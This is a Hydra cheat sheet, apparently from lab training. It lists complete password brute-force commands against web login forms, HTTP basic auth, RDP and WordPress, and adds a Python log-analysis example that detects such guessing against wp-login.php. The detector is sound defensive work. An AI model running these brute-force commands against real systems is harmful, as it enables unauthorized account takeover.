# Hydra usage

## Examples

* HTTP post form

```sh
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
```

* HTTP basic auth

```sh
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
```

|Command|Description|
|-------|-----------|
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|`hydra -v -V -u -L <username list> -P <password list> -t 1 <ip> <protocol>`|You can use Hydra to brute force usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|`hydra -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|

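
Seen from the server side, the `wp-login.php` command in the table above shows up as a burst of POSTs that return 200 until one returns the redirect that `S=Location` matches. The detector below is an added example, not part of the original cheat sheet; the log format, status codes, threshold, window and sample lines are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed, not from the page: combined log format; a failed WordPress login
# returns 200, a successful one a 302 redirect (what S=Location keys on).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATH = "/wp-login.php"


def find_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"failures": n, "success_after": bool}} for flagged IPs."""
    recent = defaultdict(deque)   # ip -> failure timestamps inside the window
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if (not m or m["method"] != "POST"
                or m["path"].split("?", 1)[0] != LOGIN_PATH):
            continue
        ip, ts = m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["status"] == "200":                      # failed attempt
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:                 # slide the window
                q.popleft()
            if ip in flagged:
                flagged[ip]["failures"] += 1
            elif len(q) >= threshold:
                flagged[ip] = {"failures": len(q), "success_after": False}
        elif m["status"] == "302" and ip in flagged:  # login worked after burst
            flagged[ip]["success_after"] = True
    return flagged


def sample_line(ip, second, status):
    # Constructed sample data using documentation addresses (RFC 5737).
    return (f'{ip} - - [10/Mar/2024:12:00:{second:02d} +0000] '
            f'"POST /wp-login.php HTTP/1.1" {status} 512 "-" "-"')


SAMPLE = [sample_line("203.0.113.7", s, 200) for s in range(8)]
SAMPLE.append(sample_line("203.0.113.7", 9, 302))    # a guess succeeded
SAMPLE.append(sample_line("198.51.100.4", 10, 200))  # one typo, then a login
SAMPLE.append(sample_line("198.51.100.4", 20, 302))

print(find_guessing(SAMPLE))
```

An entry with `success_after` set is the case to escalate: the account behind that login should have its password reset and its sessions revoked.
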
## Parameters

|Option|Description|
|------|-----------|
|`-l`|Single username|
|`-P`|Indicates to use the following wordlist|
|`http-post-form`|Indicates the method|
|/login url|The login URL|
|`:username`|The form field where the username is entered|
|`^USER^`|Tells Hydra to use the username from `-l`|
|`password`|The form field where the password is entered|
|`^PASS^`|Tells Hydra to use the wordlist from `-P`|
|Login|Indicates to Hydra the login failed message|
|Login failed|Is the login failure message that the form returns|
|`F=incorrect`|If this word appears on the page, login failed|
|`-V`|Verbose|